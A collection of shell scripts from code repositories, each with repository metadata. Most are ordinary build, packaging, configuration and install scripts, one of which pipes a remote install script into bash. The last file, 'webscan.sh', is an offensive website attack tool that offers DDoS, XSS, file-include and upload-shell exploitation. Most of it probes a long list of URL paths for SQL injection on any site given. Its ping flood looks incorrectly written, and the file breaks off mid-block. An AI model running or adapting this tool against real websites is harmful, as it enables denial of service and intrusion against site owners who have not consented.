ENABLE_CLUSTER_MONITORING="${KUBE_ENABLE_CLUSTER_MONITORING:-true}"
# Optional: Enable node logging.
ENABLE_NODE_LOGGING="${KUBE_ENABLE_NODE_LOGGING:-true}"
LOGGING_DESTINATION="${KUBE_LOGGING_DESTINATION:-elasticsearch}" # options: elasticsearch, gcp
# Optional: When set to true, Elasticsearch and Kibana will be setup as part of the cluster bring up.
ENABLE_CLUSTER_LOGGING="${KUBE_ENABLE_CLUSTER_LOGGING:-true}"
ELASTICSEARCH_LOGGING_REPLICAS=1
# Don't require https for registries in our local RFC1918 network
EXTRA_DOCKER_OPTS="--insecure-registry 10.0.0.0/8"
# Optional: Install cluster DNS.
ENABLE_CLUSTER_DNS=true
DNS_SERVER_IP="10.0.0.10"
DNS_DOMAIN="cluster.local"
DNS_REPLICAS=1
# Admission Controllers to invoke prior to persisting objects in cluster
ADMISSION_CONTROL=NamespaceLifecycle,NamespaceAutoProvision,LimitRanger,SecurityContextDeny,ServiceAccount,ResourceQuota
# Optional: Enable/disable public IP assignment for minions.
# Important Note: disable only if you have setup a NAT instance for internet access and configured appropriate routes!
ENABLE_MINION_PUBLIC_IP=${KUBE_ENABLE_MINION_PUBLIC_IP:-true}
# OS options for minions
KUBE_OS_DISTRIBUTION="${KUBE_OS_DISTRIBUTION:-ubuntu}"
KUBE_MINION_IMAGE="${KUBE_MINION_IMAGE:-}"
COREOS_CHANNEL="${COREOS_CHANNEL:-alpha}"
CONTAINER_RUNTIME="${KUBE_CONTAINER_RUNTIME:-docker}"
RKT_VERSION="${KUBE_RKT_VERSION:-0.5.5}"
|
swarren83/kubernetes
|
cluster/aws/config-default.sh
|
Shell
|
apache-2.0
| 3,707 |
#!/usr/bin/env bash
# Copyright © 2014-2015 Cask Data, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# Build script for docs
# Builds the docs (all except javadocs and PDFs) from the .rst source files using Sphinx
# Builds the javadocs and copies them into place
# Zips everything up so it can be staged
# REST PDF is built as a separate target and checked in, as it is only used in SDK and not website
# Target for building the SDK
# Targets for both a limited and complete set of javadocs
# Targets not included in usage are intended for internal usage by script
source ../_common/common-build.sh
CDAP_CLIENTS_RELEASE_VERSION="1.2.0"
CDAP_INGEST_RELEASE_VERSION="1.3.0"
CHECK_INCLUDES=${TRUE}
function download_readme_file_and_test() {
# Downloads a README.rst file to a target directory, and checks that it hasn't changed.
# Uses md5 hashes to monitor if any files have changed.
local file_name='README.rst'
local includes_dir=${1}
local source_url=${2}
local md5_hash=${3}
local relative_path=${4}
# Replace any path components with dashes
local target_file_name=${relative_path//\//-}.rst
echo "Downloading using curl ${file_name} from ${source_url}"
curl ${source_url}/${relative_path}/${file_name} --output ${includes_dir}/${target_file_name} --silent
test_an_include ${md5_hash} ${includes_dir}/${target_file_name}
}
function download_includes() {
echo "Downloading source files to be included from GitHub..."
local github_url="https://raw.githubusercontent.com/caskdata"
local includes_dir=${1}
set_version
local clients_branch="release/${CDAP_CLIENTS_RELEASE_VERSION}"
local ingest_branch="release/${CDAP_INGEST_RELEASE_VERSION}"
if [ "x${GIT_BRANCH_TYPE:0:7}" == "xdevelop" ]; then
clients_branch="develop"
ingest_branch="develop"
fi
# cdap-clients
# https://raw.githubusercontent.com/caskdata/cdap-clients/develop/cdap-authentication-clients/java/README.rst
local clients_url="${github_url}/cdap-clients/${clients_branch}"
download_readme_file_and_test ${includes_dir} ${clients_url} f99720412e7085fdc3e350205ce21bcc cdap-authentication-clients/java
# download_readme_file_and_test ${includes_dir} ${clients_url} f075935545e48a132d014c6a8d32122a cdap-authentication-clients/javascript
download_readme_file_and_test ${includes_dir} ${clients_url} 1f8330e0370b3895c38452f9af72506a cdap-authentication-clients/python
# download_readme_file_and_test ${includes_dir} ${clients_url} c16bf5ce7c1f0a2a4a680974a848cdd0 cdap-authentication-clients/ruby
# cdap-ingest
# https://raw.githubusercontent.com/caskdata/cdap-ingest/develop/cdap-file-drop-zone/README.rst
local ingest_url="${github_url}/cdap-ingest/${ingest_branch}"
download_readme_file_and_test ${includes_dir} ${ingest_url} c9b6db1741afa823c362237488c2d8f0 cdap-flume
download_readme_file_and_test ${includes_dir} ${ingest_url} 08bb5c37085d354834860cb4ca66c121 cdap-stream-clients/java
# download_readme_file_and_test ${includes_dir} ${ingest_url} 277ded1924cb8d9b52a007f262820002 cdap-stream-clients/javascript
download_readme_file_and_test ${includes_dir} ${ingest_url} 3013f72ea3454e43adedda2aed40abc1 cdap-stream-clients/python
download_readme_file_and_test ${includes_dir} ${ingest_url} 5fc88ec3a658062775403f5be30afbe9 cdap-stream-clients/ruby
echo_red_bold "Check included example files for changes"
test_an_include b53dd493c4e9c2cb89b593baa4139087 ../../cdap-examples/Purchase/src/main/java/co/cask/cdap/examples/purchase/PurchaseHistoryBuilder.java
test_an_include 80216a08a2b3d480e4a081722408222f ../../cdap-examples/Purchase/src/main/java/co/cask/cdap/examples/purchase/PurchaseHistoryService.java
test_an_include 29fe1471372678115e643b0ad431b28d ../../cdap-examples/Purchase/src/main/java/co/cask/cdap/examples/purchase/PurchaseStore.java
test_an_include 7f83b852a8e7b4594094d4e88d80a0b4 ../../cdap-examples/SparkPageRank/src/main/java/co/cask/cdap/examples/sparkpagerank/SparkPageRankApp.java
test_an_include b5aa09ede42a877e15df5e482607e256 ../../cdap-examples/WikipediaPipeline/src/main/java/co/cask/cdap/examples/wikipedia/TopNMapReduce.java
test_an_include 62144353b40314640d74d4b675432620 ../../cdap-examples/WikipediaPipeline/src/main/scala/co/cask/cdap/examples/wikipedia/ClusteringUtils.scala
}
function test_includes () {
echo "All includes tested."
}
run_command ${1}
|
chtyim/cdap
|
cdap-docs/developers-manual/build.sh
|
Shell
|
apache-2.0
| 4,870 |
#!/bin/bash -x
#
# Generated - do not edit!
#
# Macros
TOP=`pwd`
CND_PLATFORM=Android-Windows
CND_CONF=Android-Debug
CND_DISTDIR=dist
CND_BUILDDIR=build
CND_DLIB_EXT=dll
NBTMPDIR=${CND_BUILDDIR}/${CND_CONF}/${CND_PLATFORM}/tmp-packaging
TMPDIRNAME=tmp-packaging
OUTPUT_PATH=${CND_DISTDIR}/${CND_CONF}/${CND_PLATFORM}/libmoengineface.a
OUTPUT_BASENAME=libmoengineface.a
PACKAGE_TOP_DIR=MoEngineFace/
# Functions
function checkReturnCode
{
rc=$?
if [ $rc != 0 ]
then
exit $rc
fi
}
function makeDirectory
# $1 directory path
# $2 permission (optional)
{
mkdir -p "$1"
checkReturnCode
if [ "$2" != "" ]
then
chmod $2 "$1"
checkReturnCode
fi
}
function copyFileToTmpDir
# $1 from-file path
# $2 to-file path
# $3 permission
{
cp "$1" "$2"
checkReturnCode
if [ "$3" != "" ]
then
chmod $3 "$2"
checkReturnCode
fi
}
# Setup
cd "${TOP}"
mkdir -p ${CND_DISTDIR}/${CND_CONF}/${CND_PLATFORM}/package
rm -rf ${NBTMPDIR}
mkdir -p ${NBTMPDIR}
# Copy files and create directories and links
cd "${TOP}"
makeDirectory "${NBTMPDIR}/MoEngineFace/lib"
copyFileToTmpDir "${OUTPUT_PATH}" "${NBTMPDIR}/${PACKAGE_TOP_DIR}lib/${OUTPUT_BASENAME}" 0644
# Generate tar file
cd "${TOP}"
rm -f ${CND_DISTDIR}/${CND_CONF}/${CND_PLATFORM}/package/MoEngineFace.tar
cd ${NBTMPDIR}
tar -vcf ../../../../${CND_DISTDIR}/${CND_CONF}/${CND_PLATFORM}/package/MoEngineFace.tar *
checkReturnCode
# Cleanup
cd "${TOP}"
rm -rf ${NBTMPDIR}
|
favedit/MoCross
|
Source/Cross/Engine/MoEngineFace/nbproject/Package-Android-Debug.bash
|
Shell
|
apache-2.0
| 1,494 |
#!/bin/bash -x
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language go
#
# Author: Shamal Faily
export UI_REPO=/tmp/cairis-ui
rm -rf $UI_REPO
apt-get install curl
curl -sL https://deb.nodesource.com/setup_10.x | bash - && apt-get install -y nodejs
curl -sS https://dl.yarnpkg.com/debian/pubkey.gpg | apt-key add -
echo "deb https://dl.yarnpkg.com/debian/ stable main" | tee /etc/apt/sources.list.d/yarn.list
apt-get update && apt-get install -y yarn
git clone https://github.com/cairis-platform/cairis-ui $UI_REPO
yarn --cwd $UI_REPO install
yarn --cwd $UI_REPO run build
cp -r $UI_REPO/dist $CAIRIS_SRC
|
failys/CAIRIS
|
cairis/bin/installUI.sh
|
Shell
|
apache-2.0
| 1,290 |
mkdir -p proofSheet
echo "<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-41066114-3', 'auto');
ga('send', 'pageview');
</script>" > boilerPlateHeader.html
# Make thumbnails
qlmanage -ti * -o proofSheet
for f in `ls *.webm *.mp4`
do
echo $f
ffmpeg -i $f -ss 00:00:07.000 -vframes 1 -y proofSheet/$f.png
done
# Build HTML file: proofSheet.html
# echo "<script>function wrapperFunc(e) { e.preventDefault();} </script>" > proofSheet.html
cat boilerPlateHeader.html > proofSheet.html
cat notes.html >> proofSheet.html
echo "<p>Must be viewed with Chrome</p>" >> proofSheet.html
echo "<h4>Stills:</h4>" >> proofSheet.html
#echo "<table border='1'>" >> proofSheet.html
for f in `find . -type f \( -name "*.png" -o -name "*.jpg" \) -maxdepth 1 -not -type d|grep -v proofSheet.html|egrep -i "jpg|png|mov"| sed -e "s;./;;"`
do
echo "Processing $f"
#echo "<tr><td><a href='$f'><img width=150px src='proofSheet/$f.png' /></a></td><td>$f</td>" >> proofSheet.html
echo "<a href='proofSheet/$f.html'><img width=150px src='proofSheet/$f.png' /></a>" >> proofSheet.html
cat boilerPlateHeader.html > proofSheet/$f.html
# echo "<img src='../$f' />" >> proofSheet/$f.html
echo "<style>
.fill {
height: 100%;
overflow: hidden;
background-size: contain;
background-repeat: no-repeat;
background-position: top;
background-image: url('../$f');
}
</style>
<div class='fill'></div>" >> proofSheet/$f.html
done
#echo "</table>" >> proofSheet.html
echo "<h4>Videos:</h4>" >> proofSheet.html
echo "<table border='1'>" >> proofSheet.html
for f in `find . -name "*.mov" -o -name "*.webm" -o -name "*.mp4" -maxdepth 1 -not -type d|grep -v proofSheet.html|egrep -i "mp4|png|mov|webm"| sed -e "s;./;;"`
do
echo "Processing $f"
cat boilerPlateHeader.html > proofSheet/$f.html
echo "<video id='video' controls='true'' autoplay='true' src='../$f'></video>" >> proofSheet/$f.html
echo "<tr><td><a href='proofSheet/$f.html' ><img width=150px src='proofSheet/$f.png' /></a></td><td>$f</td>" >> proofSheet.html
done
echo "</table>" >> proofSheet.html
|
rwoodley/SphericalPhotoBrowser
|
makeProofSheet.sh
|
Shell
|
apache-2.0
| 2,483 |
#!/bin/sh
tg-georef.sh $TEXTGROUNDER_DATA/pcl_corpus/txt w pcl_corpus.kml
|
tectronics/textgrounder
|
bin/georef-pcl.sh
|
Shell
|
apache-2.0
| 74 |
if [ ! -d "./build" ]; then
mkdir build
fi
cd build
rm -r *
cmake -DUSE_LLVM=/usr/local/opt/llvm/bin/llvm-config -DUSE_SORT=ON ..
make -j`sysctl -n hw.ncpu`
cd ..
|
sxjscience/tvm
|
macos_cmake.sh
|
Shell
|
apache-2.0
| 168 |
echo $PWD
TASK_ROOT_DIR=$PWD
SCRIPT_DIR=$(dirname $0)
CF_API_ENDPOINT=${CF_API_ENDPOINT:-api.10.244.0.34.xip.io}
CF_USER=${CF_USER:-admin}
CF_PASSWD=${CF_PASSWD:-admin}
CF_ORG=${CF_ORG:-dev}
CF_SPACE=${CF_SPACE:-dev}
# Run as privileged
apt-get install -y wget unzip gzip
echo "Install CF binary"
cd /tmp
wget "https://cli.run.pivotal.io/stable?release=linux64-binary&version=6.11.3&source=github-rel" -O cf-linux-amd64.tgz
tar zxvf cf-linux-amd64.tgz
ls
mkdir -p /usr/local/bin
cp ./cf /usr/local/bin
export PATH=$PATH:/usr/local/bin
cf -version
echo "Finished installing CF binary!!"
echo "Installing Plugin"
ls $TASK_ROOT_DIR/*
cd $TASK_ROOT_DIR/binaries
tar zxvf *.tgz
tar tvf *.tgz
# Going to only test the linux-64 bit version...
plugin_binary=`echo $PWD/bin/linux/amd64/*`
cf install-plugin $plugin_binary
echo "Logging into CF Api endpoint: $CF_API_ENDPOINT"
cf api $CF_API_ENDPOINT --skip-ssl-validation
cf login -u $CF_USER -p $CF_PASSWD -o $CF_ORG -s $CF_SPACE
#cf target -o $CF_ORG -s $CF_SPACE
echo "Logged into CF Api endpoint: $CF_API_ENDPOINT"
echo "Pushing a Test App"
#cf push ...# Push the app
echo "Testing the Plugin"
# Add code to run the test...
|
jeaniejung/Wildcard_Plugin
|
ci/scripts/test/run.sh
|
Shell
|
apache-2.0
| 1,187 |
#!/bin/bash
#Note:you can add on this script and develop it
#But please dont remove my name from them
#The script write in bash language
a=$1
b=$2
c=$3
if [ $# -eq 0 ]
then
echo "./webscan.sh: Options Not Found Type ./webscan.sh -h to show Options"
elif [ $a == -h ]
then
echo "------------------------------------------------------"
echo "| WEBSCAN |"
echo "| |"
echo "| It is a tool that collects information |"
echo "| about the sites and extract gaps therein |"
echo "| |"
echo "| coded by ahmad nourallah |"
echo "| |"
echo "| I apologize for any error found in the script |"
echo "| Verison 1.0 |"
echo "------------------------------------------------------"
echo "Usage: ./webscan.sh [options] "
echo "Options:"
echo
echo " -DD use to start DDos attack on websites."
echo " -wim use to show website ip and mail server."
echo " -wd use to search website dns."
echo " -ac use to search website admin Cpanel."
echo
echo "Website Scan Vulnerability Options: "
echo
echo " -sql use to scan website from injection vulnerability."
echo " -xss use to scan website from cross site scripting vulnerability."
echo " -fl use to scan website from file include scan (RFI,LFI) vulnerability."
echo " -up use to scan website from upload shell vulnerability."
echo
echo "Website Exploits Options: "
echo
echo " -xsse use to exploit cross site scripting vulnerability."
echo " -lfi use to exploit local include vulnerability."
echo " -upe use to exploit upload shell vulnerability."
echo
echo "helps:"
echo
echo " -h use to show this page"
echo " -v use to show script verison"
echo " -to use to see tools options"
echo
echo "Example: ./webscan.sh -DD google.com "
elif [ $a == "-v" ]
then
echo "Verison 1.0 "
echo " All Rights Reserved to Ahmad Nourallah"
elif [ $a == "-to" ]
then
while true
do
echo "Note: Press <exit> to exit tools helper"
read -p "welcome in tools helper enter the tools name to see Usage [Example: (-DD)]: " tools
if [ "$tools" == '-DD' ]
then
clear
echo "Website killer: "
echo "Usage :"
echo " ./webscan.sh -DD (Website URL)"
echo "-------------------------------------------------------------"
read -p "Prees Enter to continue"
elif [ "$tools" == '-wim' ]
then
clear
echo "Website Ip And Mail Finder: "
echo "Usage :"
echo " ./webscan.sh -wim (Website URL)"
echo "-------------------------------------------------------------"
read -p "Prees Enter to continue"
elif [ "$tools" == '-wd' ]
then
clear
echo "Website Dns Finder: "
echo "Usage :"
echo " ./webscan.sh -wd (Website URL) (Website Name)"
echo "-------------------------------------------------------------"
read -p "Prees Enter to continue"
elif [ "$tools" == '-ac' ]
then
clear
echo "Admin Cpanel Finder: "
echo "Usage :"
echo " ./webscan.sh -ac (Website URL)"
echo "-------------------------------------------------------------"
read -p "Prees Enter to continue"
elif [ "$tools" == '-sql' ]
then
clear
echo "Sql Injection Finder: "
echo "Usage :"
echo " ./webscan.sh -sql (Website URL)"
echo "-------------------------------------------------------------"
read -p "Prees Enter to continue"
elif [ "$tools" == '-xss' ]
then
clear
echo "Cross Site Scripting Finder: "
echo "Usage :"
echo " ./webscan.sh -xss (Website URL)"
echo "-------------------------------------------------------------"
read -p "Prees Enter to continue"
elif [ "$tools" == '-fl' ]
then
clear
echo "File Include (RFI,LFI) Finder: "
echo "Usage :"
echo " ./webscan.sh -fl (Website URL)"
echo "-------------------------------------------------------------"
read -p "Prees Enter to continue"
elif [ "$tools" == '-up' ]
then
clear
echo "Upload Shell Vulnerability Finder: "
echo "Usage :"
echo " ./webscan.sh -up (Website URL)"
echo "-------------------------------------------------------------"
read -p "Prees Enter to continue"
elif [ "$tools" == '-sqle' ]
then
clear
echo "Sql Injection Exploiter (Sqlmap): "
echo "Usage :"
echo " ./webscan.sh -sqle (Website URL)"
echo "-------------------------------------------------------------"
read -p "Prees Enter to continue"
elif [ "$tools" == '-xsse' ]
then
clear
echo "Cross Site Scripting Exploiter: "
echo "Usage :"
echo " ./webscan.sh -xsse (Website URL)"
echo "-------------------------------------------------------------"
read -p "Prees Enter to continue"
elif [ "$tools" == '-lfi' ]
then
clear
echo "Local File Include Exploiter: "
echo "Usage :"
echo " ./webscan.sh -lfi (Website URL)"
echo "-------------------------------------------------------------"
read -p "Prees Enter to continue"
elif [ "$tools" == "-upe" ]
then
clear
echo "Upload Shell Vulnerability Exploiter: "
echo "Usage :"
echo " ./webscan.sh -upe (Website URL)"
echo "-------------------------------------------------------------"
read -p "Prees Enter to continue"
elif [ "$tools" == "exit" ]
then
exit
else
clear
echo "Tools Not Found"
echo "-------------------------------------------------------------"
read -p "Prees Enter to continue"
fi
done
elif [ $a == -DD ]
then
echo "[*]The attack started Press <ctrl+c> to exit attack."
ping -l 10000000 -W 2100 $b &> /dev/null
elif [ $a == -wim ]
then
echo "Website ip and mail server: "
host $b
elif [ $a == -wd ]
then
echo "Website Dns: "
wget -qO- $b | cat | grep "href=" | cut -d"/" -f3 | cut -d'"' -f1 |grep "$c" | sort -u
elif [ $a == -sql ]
then
echo "The search started if we found vulnerability we will tell you ......"
echo "---------------------------------------------------------------------"
d="/index.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/article_preview.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Pages/whichArticle.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/view_items.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Sales/view_item.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/book.php?isbn='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/knowledge_base/detail.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/gallery/gallery.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/event.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/detail.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/store/home.php?cat='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/view_items.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/detail.php?ID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/event_details.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/detailedbook.php?isbn='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/fatcat/home.php?view='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/events/index.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/static.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/answer/default.php?pollID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/news/detail.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/view_items.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/view_items.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/gallery/detail.php?ID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/print.php?sid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/view_items.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/board/showthread.php?t='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/book.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/event.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/more_detail.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/knowledge_base/detail.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/knowledge_base/detail.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/content.php?ID='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Shop/home.php?cat='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/store/home.php?cat='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/print.php?sid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/gallery.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/resources/index.php?cat='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/events/event.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/view_items.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/default.php?cPath='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/content.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/products/products.php?p='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/auction/item.php?id='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/products.php?cat='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > sql found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/clan_page.php?cid='"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
